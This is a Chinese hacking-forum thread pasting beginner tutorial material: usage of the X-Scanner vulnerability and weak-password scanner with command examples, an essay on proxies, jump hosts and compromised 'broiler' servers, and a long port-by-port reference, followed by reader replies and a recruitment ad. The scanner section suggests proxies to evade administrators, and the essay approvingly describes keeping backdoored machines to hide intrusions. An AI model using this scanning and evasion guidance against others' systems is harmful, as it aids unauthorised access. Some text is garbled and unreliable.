“这个是自然，作为黑客的必备武器之一，国产扫描器有很多优秀的作品，前面我提到的安全焦点的X-Scanner，就是我最为欣赏的扫描器，而且我老人家也时常常的使用，但是不知道为什么，在对X-Scanner进行病毒测试的时候，熊猫和KV3000都能在X-Scanner里面发现两个木马程序。这一点是我们要非常的注意的。当然也要请安全焦点的朋友做做解释工作。” 　　“前辈既然如此欣赏X-Scanner，那就给我详细介绍一下吧！” 　　“X-Scanner运行在Windows平台下，它主要针对WindowsNT/Windows 2000操作系统的安全进行全面细致评估，可以扫描出很多Windows系统流行的漏洞，并详细的指出安全的脆弱环节与弥补措施。X-Scanner采用多线程方式对指定IP地址段(或单机)进行安全漏洞扫描，支持插件功能，提供了图形界面和命令行两种操作方式。 　扫描范围包括： 　　（1）标准端口状态及端口banner信息； 　　（2）CGI漏洞； 　　（3）RPC漏洞； 　　（4）SQL-SERVER默认帐户； 　　（5）FTP弱口令； 　　（6）NT主机共享信息； 　　（7）用户信息； 　　（8）组信息； 　　（9）NT主机弱口令用户等。 　　X-Scanner会将扫描结果保存在/log/目录中，index_*.htm为扫描结果索引文件。并对于一些已知漏洞，X-Scanner给出了相应的漏洞描述，利用程序及解决方案。X-Scanner扫描的内容是绝大多数的服务器容易出现的漏洞和安全设置问题。最常用的还是其中的SQL默认帐户、FTP弱口令和共享扫描，他们能揭示出许多麻痹大意的网管犯的一些低级错误。” 　　“前辈能不能具体说说X-Scanner如何使用呢？” 　　“打开了X-Scanner，在扫描项目中可以任意的指定单独扫描哪一个特定的项目。比较多的是CGI和SQL或者FTP默认口令，这些都是很致命的服务器漏洞。” 　　“下一步需要在〖扫描设置〗中进行参数的设置。一般的情况下，只对〖运行参数〗中的扫描范围进行设置。在那里只要填写网站服务器的IP地址就可以，可以填写一个来针对某一个特定的网站或服务器，也可以填写一个IP段范围，来扫描一段IP地址上所有的计算机。具体扫描参数格式如下： 　　1.命令行：Xscan -h [起始地址]<-[终止地址]> [扫描选项] 　　 其中的[扫描选项]含义如下： 　　 -p: 扫描标准端口(端口列表可通过\dat\config.ini文件定制)； 　　 -b: 获取开放端口的banner信息，需要与-p参数合用； 　　 -c: 扫描CGI漏洞； 　　 -r: 扫描RPC漏洞； 　　 -s: 扫描SQL-SERVER默认帐户； 　　 -f: 尝试FTP默认用户登录(用户名及口令可以通过\dat\config.ini文件定制)； 　　 -n: 获取NetBios信息(若远程主机操作系统为Windows9x/NT4.0/2000)； 　　 -g: 尝试弱口令用户连接(若远程主机操作系统为Windows NT4.0/2000)； 　　 -a: 扫描以上全部内容； -x [代理服务器:端口]: 通过代理服务器扫描CGI漏洞； 　　 -t: 设置线程数量，默认为20个线程； 　　 -v: 显示详细扫描进度； 　　 -d: 禁止扫描前PING被扫主机。 　　2.示例： 　　Xscan -h xxx.xxx.1.1-xxx.xxx.10.255 -a 　　含义：扫描XXX.XXX.1.1-XXX.XXX.10.255网段内主机的所有信息； 　　Xscan -h xxx.xxx.1.1 -n -g -t 30 　　含义：获取XXX.XXX.1.1主机的Netbios信息，并检测NT弱口令用户，线程数量为30； 　　Xscan -h xxx.xxx.1.1 -p -b -c -x 129.66.58.13:80 -v -d 　　含义：扫描xxx.xxx.1.1主机的标准端口状态，通过代理服务器"129.66.58.13:80"扫描CGI漏洞，检测端口banner信息，且扫描前不通过PING命令检测主机状态，显示详细扫描进度。” 　　“在〖运行参数〗中，有很大的选择余地，比如它可以设置代理服务器来躲避网管的追查，并课以设置扫描的线程。对扫描显示也可以进行详细的选择。然后扫描器就开始工作了。” 　　“好啊，我去试试。” 　　“另外我要提醒你注意的是，在使用这些扫描软件的时候一定要看清楚里面有没有可以的程序，以防自己先中了别人的招。此外，虽然你刺客手中有刀，但是现在的网站管理员也会使用这些宝刀，所以说，手中有绝世好刀，不一定就能杀死所有的敌人。好了，你去吧！”
代理、肉鸡、跳板的概念看到有的网友还用那种8080、80端口的代理，我有话说，也可以说为大家做一点最最基础的黑客教程，大家看完自己去做吧，具体怎么做，我就不说了，可以说我把我所知道的肉鸡和跳板的概念知识全部告诉大家了，我也在几个地方发表过，这是我的原创，我要告诉大家的是真正在黑客抢劫服务器是用的跳板是什么，以及黑客们很少说的跳板知识介绍~~~~~~~~~~我有个习惯，总是喜欢让大家看一篇文章的时候知道：为 什么要看这篇文章？这篇文章要让自己知道或是学到什么东西，我尽量把自己所 掌握的东西尽量简化后用通俗的语言表达。大家看完后有什么不好的地方，请指出，我好学习到新的东西，我很高兴自己能把自己所学到的东西和大家分享，在 这里的认识的网友们有想成为黑客的；有想随便玩玩；有的想学，但是不久就感觉学网络安全很难就退却了。我真的很希望大家能找到自己的目标，做自己喜欢的事情，不要一天就黑小企鹅和一天泡在别人的软件里（至少要尝试读一些简单的代码），学习黑客知识是孤独的，必须完全靠自己的努力，很少有人能帮你的，开始你会觉得很无助，但是慢慢的，你将习惯这种感觉和方式，要自己努力才会有成果的，我和大家一样也在不停的探索网络知识，现在不过是把自己学到的东西和大家分享罢了。是不是我象大姨妈啊！！呵呵~~~婆婆***！我看到很多的网友聊代理的时候，概念很模糊，甚至搞出了笑话，所以今天我就谈谈很多朋友初涉网安的一个误区（认识代理、跳板、肉鸡）。有的网友说那还不简单，找个运行就能隐藏IP的软件，我早说过了，我没有见过这种软件或许说根本不存在这种软件（懒惰的人更勤于此道）再者对抢劫服务器者而言把自己的身家性命放在一个隐藏自己IP的软件上是很不明智的，要知道抢劫服务器时会尝试很多的连接，在你一不小心的时候你就把自己卖了（我曾经在一次抢劫服务器完毕后没有用sc32设置好跳板的IE，而是随手在桌面上双击浏览器去看黑页，结果把自己给卖了，本来没有什么可怕的，但是我们要养成做任何事都无懈可击的习惯。再者~~~嘘嘘~~还好是RB鬼子的系统。）所以我根本不相信什么隐藏IP的软件，也许我孤陋寡闻或是真有这样的东西，但至少我是不会用的，除非有人张罗着把我毙了，那么我可以考虑一下。我要说此文适合菜鸟阅读，高手止步！！！我上小企鹅，老有网友问我代理和跳板以及肉鸡是指同一类概念吗？它们怎么样工作的？因为在小企鹅上不可能讲很清楚，涉及的东西太多了，因为此文是面向和我一样初人涉网络网络安全的朋友，那么我就简单的说说。首先是代理（泛指80；8080；1080端口），很多网友认为用代理猎手设置好端口之后就可以为自己找个代理在IE、FTP等里面设置后来隐藏IP，这就是肉鸡或认为这就是跳板，其实不然，为什么呢？就我个人来看这样的代理简直就是垃圾（有的网友不服气了，等等，我一会告诉你为什么我这么说），1、首先一个速度比较慢，我用这样的代理用过很多国家，包括国内的，感觉都是其慢，没有那种快速的感觉；2、不稳定。大家一定都想拥有一个稳定的代理吧~~~呵呵但是这样的代理通常有原因的，不是服务器自身漏洞就是为了自身利益而增加的服务，当他的愿望达成以后或是网管发现以后，你就不能再用了。3、多人使用。如果你用8080、1080、80等端口的代理，我敢保证这个代理不止你一个人用，如果你想成为一个黑客或是老手的话，拥有一个自己的代理是必须的。4、保密性。有的代理服务器提供者很可恶，他们利用代理得知你的密码或一些敏感信息，因为普通代理数据没有经过加密（1080端口除外），用一个嗅探器就可以知道你输入的数据，别忘了代理的最最基本原理是数据转发哟。好了，有了以上的缺点你还敢用或是有信心用它吗？这就是我为什么叫它LJ的原因了。有网友会问：那什么样的代理才没有这些缺点呢？别急，我下面就要说。socks5.这是一个很不错的跳板软件，很小（32K）功能却是不凡，它是sock4的接替者，原来的sock4只支持UDP协议（这个大家去看书吧，我不多说了），而sock5支持USP和TCP两种协议，还有数据的传输是加密的所以真的很佩服作者的编程能力。如果你简单的使用它，那你上个小企鹅啊或IRC啦，那是没有什么问题啦，而且它的速度很快几乎和你使用本地机没有什么差别（当然不能加太多跳板），sock5支持你搭建255个跳板，也就是你可以用skserverGUI来编辑多达255个安装了sock5的机器来运行达到你隐藏IP的目的，但我想如果我看见有人这样做的话，我会马上打电话到精神病院~~~：）而且用sc32来配合skserverGUI的话，那么你的电脑几乎就没有应用程序不能用代理的。你用过之后一定会说：我喜欢！我选择！sock5的安装也很简单，在此软件的说明书里有，因为我主要是让大家了解代理------&g*;跳板------&g*;肉鸡的简单原理；再者因为制作这样的跳板或肉鸡很有攻击性（会构成非法使用他人电脑），而且网上有很多人不自觉，我可不想以后有人被抓了，说我曾经为他的犯罪生涯做过贡献。好了！最后我们来说说肉鸡吧肉鸡是什么？在小企鹅上也有朋友问我，我认为这是中国黑客对自己开了后门的服务器为将来自己做一些事时使用的机器的一种自豪而又亲切的叫法.肉鸡是老手常用的代理，也就是*elne*的那种，完全是靠自己制作的，端口加密码啦！绝对只有你一个人用，当然被别人提前下手的话，那你就清除它的后门就可以了，当你第一次拥有这种服务器的时候你的心情是什么样的？我个人感觉是象初恋一样。有3389肉鸡通常可以图形化*作，从而发动拒绝服务攻击，那么我们用什么样系统的肉鸡呢？~~~~恩！marke这个问题问的很好~~：）我喜欢用windows 2000和linux，虽然我一直采用WIN 2000但是告诉大家一个好消息我刚刚拥有了自己第一台LINUX肉鸡，对我这个正在学习LINUX的家伙来说，没事到上面熟悉一下LINUX指令是件很愉快的事。要想学用这种肉鸡必须熟练DOS指令（指windows)，因为没有图形界面让你玩的。做一个黑客必须适应字符化的*作当你*elne*到一台你服务器里（肉鸡）你就可以踏雪无痕了，就象“信息公路牛崽”（抢劫服务器五角大楼的美国天才黑客）一样先连接到RB、到中东、再绕回美国本土抢劫服务器五角大楼，听上去很神秘吧，其实用的原理就是这个。

如果我中间占一楼的话，楼主怎么办？

端口可分为3大类： 1） 公认端口（Well Known Ports）：从0到1023，它们紧密绑定于一些服务。通常这些端口的通讯明确表明了某种服 务的协议。例如：80端口实际上总是HTTP通讯。 2） 注册端口（Registered Ports）：从1024到49151。它们松散地绑定于一些服务。也就是说有许多服务绑定于这些端口，这些端口同样用于许多其它目的。例如：许多系统处理动态端口从1024左右开始。 3） 动态和/或私有端口（Dynamic and/or Private Ports）：从49152到65535。理论上，不应为服务分配这些端口。实际上，机器通常从1024起分配动态端口。但也有例外：SUN的RPC端口从32768开始。 　　本节讲述通常TCP/UDP端口扫描在防火墙记录中的信息。记住：并不存在所谓ICMP端口。如果你对解读ICMP数据感兴趣，请参看本文的其它部分。0通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口，当你试 图使用一种通常的闭合端口连接它时将产生不同的结果。一种典型的扫描：使用IP地址为 0.0.0.0，设置ACK位并在以太网层广播。 1 tcpmux 这显示有人在寻找SGIIrix机器。Irix是实现tcpmux的主要提供者，缺省情况下tcpmux在这种系统中被打开。Iris机器在发布时含有几个缺省的无密码的帐户，如lp,guest, uucp, nuucp, demos, tutor, diag, EZsetup, OutOfBox, 和4Dgifts。许多管理员安装后忘记删除这些帐户。因此Hacker们在Internet上搜索tcpmux 并利用这些帐户。 7Echo你能看到许多人们搜索Fraggle放大器时，发送到x.x.x.0和x.x.x.255的信息。常见的一种DoS攻击是echo循环（echo-loop），攻击者伪造从一个机器发送到另一个UDP数据包，而两个机器分别以它们最快的方式回应这些数据包。（参见Chargen） 另一种东西是由DoubleClick在词端口建立的TCP连接。有一种产品叫做Resonate Global Dispatch”，它与DNS的这一端口连接以确定最近的路由。Harvest/squid cache将从3130端口发送UDPecho：“如果将cache的source_ping on选项打开，它将对原始主机的UDP echo端口回应一个HIT reply。”这将会产生许多这类数据包。 11 sysstat这是一种UNIX服务，它会列出机器上所有正在运行的进程以及是什么启动了这些进程。这为入侵者提供了许多信息而威胁机器的安全，如暴露已知某些弱点或帐户的程序。这与UNIX系统中“ps”命令的结果相似再说一遍：ICMP没有端口，ICMP port 11通常是ICMPtype=1119 chargen 这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有LJ字符的包。TCP连接时，会发送含有LJ字符的数据流知道连接关闭。Hacker利用IP欺骗可以发动DoS攻击伪造两 个chargen服务器之间的UDP由于服务器企图回应两个服务器之间的无限的往返数据通讯一个chargen和echo将导致服务器过载。同样fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包，受害者为了回应这些数据而过载。 21 ftp最常见的攻击者用于寻找打开“anonymous”的ftp服务器的方法。这些服务器带有可读写的目录。Hackers或tackers利用这些服务器作为传送warez (私有程序) 和pr0n(故意拼错词而避免被搜索引擎分类)的节点。 22 sshPcAnywhere建立TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点。如果配置成特定的模式，许多使用RSAREF库的版本有不少漏洞。（建议在其它端口运行ssh）还应该注意的是ssh工具包带有一个称为ake-ssh-known-hosts的程序。它会扫描整个域的ssh主机。你有时会被使用这一程序的人无意中扫描到。UDP（而不是TCP）与另一端的5632端口相连意味着存在搜索pcAnywhere的扫描。5632 （十六进制的0x1600）位交换后是0x0016（使进制的22）。 23 Telnet入侵者在搜索远程登陆UNIX的服务。大多数情况下入侵者扫描这一端口是为了找到机器运行的操作系统。此外使用其它技术，入侵者会找到密码。 25 smtp攻击者（spammer）寻找SMTP服务器是为了传递他们的spam。入侵者的帐户总被关闭，他们需要拨号连接到高带宽的e-mail服务器上，将简单的信息传递到不同的地址。SMTP服务器（尤其是sendmail）是进入系统的最常用方法之一，因为它们必须完整的暴露于Internet且邮件的路由是复杂的（暴露+复杂=弱点）。 53 DNSHacker或crackers可能是试图进行区域传递（TCP），欺骗DNS（UDP）或隐藏其它通讯。因此防火墙常常过滤或记录53端口。 需要注意的是你常会看到53端口做为UDP源端口。不稳定的防火墙通常允许这种通讯并假设这是对DNS查询的回复。Hacker常使用这种方法穿透防火墙。 67和68 Bootp和DHCPUDP上的Bootp/DHCP：通过DSL和cable-modem的防火墙常会看见大量发送到广播地址255.255.255.255的数据。这些机器在向DHCP服务器请求一个地址分配。Hacker常进入它们分配一个地址把自己作为局部路由器而发起大量的“中间人”（man-in-middle）攻击。客户端向68端口（bootps）广播请求配置，服务器向67端口（bootpc）广播回应请求。这种回应使用广播是因为客户端还不知道可以发送的IP地址。69 TFTP(UDP) 许多服务器与bootp一起提供这项服务，便于从系统下载启动代码。但是它们常常错误配置而从系统提供任何文件，如密码文件。它们也可用于向系统写入文件 79 finger Hacker用于获得用户信息，查询操作系统，探测已知的缓冲区溢出错误，回应从自己机器到其它机器finger扫描。 98 linuxconf 这个程序提供linuxboxen的简单管理。通过整合的HTTP服务器在98端口提供基于Web界面的服务。它已发现有许多安全问题。一些版本setuidroot，信任局域网，在/tmp下建立Internet可访问的文件，LANG环境变量有缓冲区溢出。 此外因为它包含整合的服务器，许多典型的HTTP漏洞可能存在（缓冲区溢出，历遍目录等）109 POP2并不象POP3那样有名，但许多服务器同时提供两种服务（向后兼容）。在同一个服务器上POP3的漏洞在POP2中同样存在。110 POP3用于客户端访问服务器端的邮件服务。POP3服务有许多公认的弱点。关于用户名和密码交换缓冲区溢出的弱点至少有20个（这意味着Hacker可以在真正登陆前进入系统）。成功登陆后还有其它缓冲区溢出错误。 111 sunrpc portmap rpcbind Sun RPCPortMapper/RPCBIND。访问portmapper是扫描系统查看允许哪些RPC服务的最早的一步。常 见RPC服务有：pc.mountd, NFS, rpc.statd, rpc.csmd, rpc.ttybd, amd等。入侵者发现了允许的RPC服务将转向提供 服务的特定端口测试漏洞。记住一定要记录线路中的daemon, IDS, 或sniffer，你可以发现入侵者正使用什么程序访问以便发现到底发生了什么。 113 Ident auth .这是一个许多机器上运行的协议，用于鉴别TCP连接的用户。使用标准的这种服务可以获得许多机器的信息（会被Hacker利用）。但是它可作为许多服务的记录器，尤其是FTP, POP, IMAP, SMTP和IRC等服务。通常如果有许多客户通过防火墙访问这些服务，你将会看到许多这个端口的连接请求。记住，如果你阻断这个端口客户端会感觉到在防火墙另一边与e-mail服务器的缓慢连接。许多防火墙支持在TCP连接的阻断过程中发回T，着将回停止这一缓慢的连接。 119 NNTP news新闻组传输协议，承载USENET通讯。当你链接到诸如：news:p.security.firewalls/. 的地址时通常使用这个端口。这个端口的连接企图通常是人们在寻找USENET服务器。多数ISP限制只有他们的客户才能访问他们的新闻组服务器。打开新闻组服务器将允许发/读任何人的帖子，访问被限制的新闻组服务器，匿名发帖或发送spam。 135 oc-serv MS RPC end-point mapper Microsoft在这个端口运行DCE RPC end- point mapper为它的DCOM服务。这与UNIX 111端口的功能很相似。使用DCOM和/或RPC的服务利用 机器上的end-point mapper注册它们的位置。远端客户连接到机器时，它们查询end-point mapper找到服务的位置。同样Hacker扫描机器的这个端口是为了找到诸如：这个机器上运 行Exchange Server吗？是什么版本？ 这个端口除了被用来查询服务（如使用epdump）还可以被用于直接攻击。有一些DoS攻 击直接针对这个端口。 137 NetBIOS name service nbtstat (UDP)这是防火墙管理员最常见的信息，请仔细阅读文章后面的NetBIOS一节 139 NetBIOS　File and Print Sharing 通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于Windows“文件和打印机共享”和SAMBA。在Internet上共享自己的硬盘是可能是最常见的问题。 大量针对这一端口始于1999，后来逐渐变少。2000年又有回升。一些vbs（IE5 VisualBasicscripting）开始将它们自己拷贝到这个端口，试图在这个端口繁殖。 143 IMAP和上面POP3的安全问题一样，许多IMAP服务器有缓冲区溢出漏洞运行登陆过程中进入。记住：一种Linux蠕虫（admw0rm）会通过这个端口繁殖，因此许多这个端口的扫描来自不知情的已被感染的用户。当RadHat在他们的Linux发布版本中默认允许IMAP后，这些漏洞变得流行起来。Morris蠕虫以后这还是第一次广泛传播的蠕虫。这一端口还被用于IMAP2，但并不流行。 已有一些报道发现有些0到143端口的攻击源于脚本。 161 SNMP(UDP)入侵者常探测的端口。SNMP允许远程管理设备。所有配置和运行信息都储存在数据库中，通过SNMP客获得这些信息。许多管理员错误配置将它们暴露于Internet。Crackers将试图使用缺省的密码“public”“private”访问系统。他们可能会试验所有可能的组合。 SNMP包可能会被错误的指向你的网络。Windows机器常会因为错误配置将HP JetDirect rmote management软件使用SNMP。HP OBJECT IDENTIFIER将收到SNMP包。新版的Win98使用SNMP解析域名，你会看见这种包在子网内广播（cable modem, DSL）查询sysName和其它信息。 162 SNMP trap 可能是由于错误配置 177 xdmcp 许多Hacker通过它访问X-Windows控制台，它同时需要打开6000端口。 513 rwho 可能是从使用cable modem或DSL登陆到的子网中的UNIX机器发出的广播。这些人为Hacker进入他们的系统提供 了很有趣的信息 553 CORBA IIOP (UDP) 如果你使用cable modem或DSL VLAN，你将会看到这个端口的广播。CORBA是一种面向对象的RPC（remote procedure call）系统。Hacker会利用这些信息进入系统。 600 Pcserver backdoor 请查看1524端口一些玩script的孩子认为他们通过修改ingreslock和pcserver文件已经完全攻破了系统-- Alan J. Rosenthal.端口全解析（下）635 mountd Linux的mountd Bug。这是人们扫描的一个流行的Bug。大多数对这个端口的扫描是基于UDP的，但基于TCP 的mountd有所增加（mountd同时运行于两个端口）。记住，mountd可运行于任何端口（到底在哪个端口，需要在端口111做portmap查询），只是Linux默认为635端口，就象NFS通常运行于2049端口1024 许多人问这个端口是干什么的。它是动态端口的开始。许多程序并不在乎用哪个端口连接网络，它们请求操作系统为它们分配“下一个闲置端口”。基于这一点分配从端口1024开始。这意味着第一个向系统请求分配动态端口的程序将被分配端口1024。为了验证这一点，你可以重启机器，打开Telnet，再打开一个窗口运行“natstat -a”，你将会看到Telnet被分配1024端口。请求的程序越多，动态端口也越多。操作系统分配的端口将逐渐变大。再来一遍，当你浏览Web页时用“netstat”查看，每个Web页需要一个新端口。1025 参见1024 1026 参见1024 1080 SOCKS 这一协议以管道方式穿过防火墙，允许防火墙后面的许多人通过一个IP地址访问Internet。理论上它应该只允许内部的通信向外达到Internet。但是由于错误的配置，它会允许Hacker/Cracker的位于防火墙外部的攻击穿过防火墙。或者简单地回应位于Internet上的计算机，从而掩饰他们对你的直接攻击。 WinGate是一种常见的Windows个人防火墙，常会发生上述的错误配置。在加入IRC聊天室时常会看到这种情况。 1114 SQL 系统本身很少扫描这个端口，但常常是sscan脚本的一部分。 1243 Sub-7木马（TCP）参见Subseven部分。 1524 ingreslock后门 许多攻击脚本将安装一个后门Sh*ll 于这个端口（尤其是那些针对Sun系统中Sendmail和RPC服务漏洞的脚本，如statd,ttdbserver和cmsd）。如果你刚刚安装了你的防火墙就看到在这个端口上的连接企图，很可能是上述原因。你可以试试Telnet到你的机器上的这个端口，看看它是否会给你一个Sh*ll 。连接到600/pcserver也存在这个问题。 2049 NFS NFS程序常运行于这个端口。通常需要访问portmapper查询这个服务运行于哪个端口，但是大部分情况是安装后NFS杏谡飧龆丝冢?acker/Cracker因而可以闭开portmapper直接测试这个端口。 3128 squid 这是Squid HTTP代理服务器的默认端口。攻击者扫描这个端口是为了搜寻一个代理服务器而匿名访问Internet。你也会看到搜索其它代理服务器的端口： 000/8001/8080/8888。扫描这一端口的另一原因是：用户正在进入聊天室。其它用户（或服务器本身）也会检验这个端口以确定用户的机器是否支持代理。请查看5.3节。 5632 pcAnywere你会看到很多这个端口的扫描，这依赖于你所在的位置。当用户打开pcAnywere时，它会自动扫描局域网C类网以寻找可能得代理（译者：指agent而不是proxy）。Hacker/cracker也会寻找开放这种服务的机器，所以应该查看这种扫描的源地址。一些搜寻pcAnywere的扫描常包含端口22的UDP数据包。参见拨号扫描。 6776 Sub-7 artifact 这个端口是从Sub-7主端口分离出来的用于传送数据的端口。例如当控制者通过电话线控制另一台机器，而被控机器挂断时你将会看到这种情况。因此当另一人以此IP拨入时，他们将会看到持续的，在这个端口的连接企图。（译者：即看到防火墙报告这一端口的连接企图时，并不表示你已被Sub-7控制。）6970 RealAudio RealAudio客户将从服务器的6970-7170的UDP端口接收音频数据流。这是由TCP7070端口外向控制连接设置13223 PowWow PowWow 是Tribal Voice的聊天程序。它允许用户在此端口打开私人聊天的接。这一程序对于建立连接非常具有“进攻性”。它会“驻扎”在这一TCP端口等待回应。这造成类似心跳间隔的连接企图。如果你是一个拨号用户，从另一个聊天者手中“继承”了IP地址这种情况就会发生：好象很多不同的人在测试这一端口。这一协议使用“OPNG”作为其连接企图的前四个字节。 17027 Conducent这是一个外向连接。这是由于公司内部有人安装了带有Conducent "adbot" 的共享软件。Conducent "adbot"是为共享软件显示广告服务的。使用这种服务的一种流行的软件是Pkware。有人试验：阻断这一外向连接不会有任何问题，但是封掉IP地址本身将会导致adbots持续在每秒内试图连接多次而导致连接过载： 机器会不断试图解析DNS名─ads.conducent.com，即IP地址216.33.210.40 ； 216.33.199.77 ；216.33.199.80 ；216.33.199.81；216.33.210.41。（译者：不知NetAnts使用的Radiate是否也有这种现象） 27374 Sub-7木马(TCP) 参见Subseven部分。 30100 NetSphere木马(TCP) 通常这一端口的扫描是为了寻找中了NetSphere木马。 31337 Back Orifice “eliteHacker中31337读做“elite”/ei’li:t/（译者：法语，译为中坚力量，精华。即 3=E, 1=L, 7=T）。因此许多后门程序运行于这一端口。其中最有名的是Back Orifice。曾经一段时间内这是Internet上最常见的扫描。现在它的流行越来越少，其它的 木马程序越来越流行。 31789 Hack-a-tack 这一端口的UDP通讯通常是由于"Hack-a-tack"远程访问木马（RAT,Remote Access Trojan）。这种木马包含内置的31790端口扫描器，因此任何31789端口到317890端口的连 接意味着已经有这种入侵。（31789端口是控制连接，317890端口是文件传输连接） 32770~32900 RPC服务 Sun Solaris的RPC服务在这一范围内。详细的说：早期版本的Solaris（2.5.1之前）将 portmapper置于这一范围内，即使低端口被防火墙封闭仍然允许Hacker/cracker访问这一端口。 扫描这一范围内的端口不是为了寻找portmapper，就是为了寻找可被攻击的已知的RPC服务。 33434~33600 traceroute 如果你看到这一端口范围内的UDP数据包（且只在此范围之内）则可能是由于traceroute。参见traceroute分。 41508 Inoculan早期版本的Inoculan会在子网内产生大量的UDP通讯用于识别彼此。参见 http://www.circlemud.org/~jelson/software/udpsend.htmlhttp://www.ccd.bnl.gov/nss/tips/inoculan/index.html端口1~1024是保留端口，所以它们几乎不会是源端口。但有一些例外，例如来自NAT机器的连接。 常看见紧接着1024的端口，它们是系统分配给那些并不在乎使用哪个端口连接的应用程序的“动态端口”。 Server Client 服务描述 1-5/tcp 动态 FTP 1-5端口意味着sscan脚本 20/tcp 动态 FTP FTP服务器传送文件的端口 53 动态 FTP DNS从这个端口发送UDP回应。你也可能看见源/目标端口的TCP连接。 123 动态 S/NTP 简单网络时间协议（S/NTP）服务器运行的端口。它们也会发送到这个端口的广播。 27910~27961/udp 动态 Quake Quake或Quake引擎驱动的游戏在这一端口运行其服务器。因此来自这一端口范围的UDP包或发送至这一端口范围的UDP包通常是游戏。 61000以上 动态 FTP 61000以上的端口可能来自Linux NAT服务器（IP asquerade）

-----------、黑客之路-----从这里开始----------
                                                   以上就是我 找到的
                          有关 刚开的目录的 本分 具体内容！
                                   拿出来 和大家分享下!
   
                                        并且 ，望 各位网友帮忙找下！
                                 
                                   剩余的其他部分！
                            -------------------谢谢--------------------

别更新了 直接贴PDF吧。。。。

my  God！太多 了。。。

眼睛都花了

啥啊都是，太乱了

都是些老的不能再老的东西了

复杂哦!!!

直接PDF吧 好乱 看雪好像是学习crack技术为主

反正看什么都是看，看看好啦！

楼主你直接把书发上来好了!

排版......

飞过！！！！！！！！！！！！！！！！！！！

晕了 都

好乱下 都复制下来的 ？？

这里是 我以上的附件！

上传的附件：

• 黑客值初级教程.doc （234.00kb，54次下载）

我可是想做红客呢～～
哈哈～～～
只是级别不够
菜鸟以下。。。

-----------、黑客之路-----从这里开始----------
--------------------------------------------------
--------------找伙伴-------求爱好者------------
---------------有兴趣的来：
                                     黑鹰工作室
                                          百度HI:1285279   
                                            QQ：51581803
                                    期待你的加入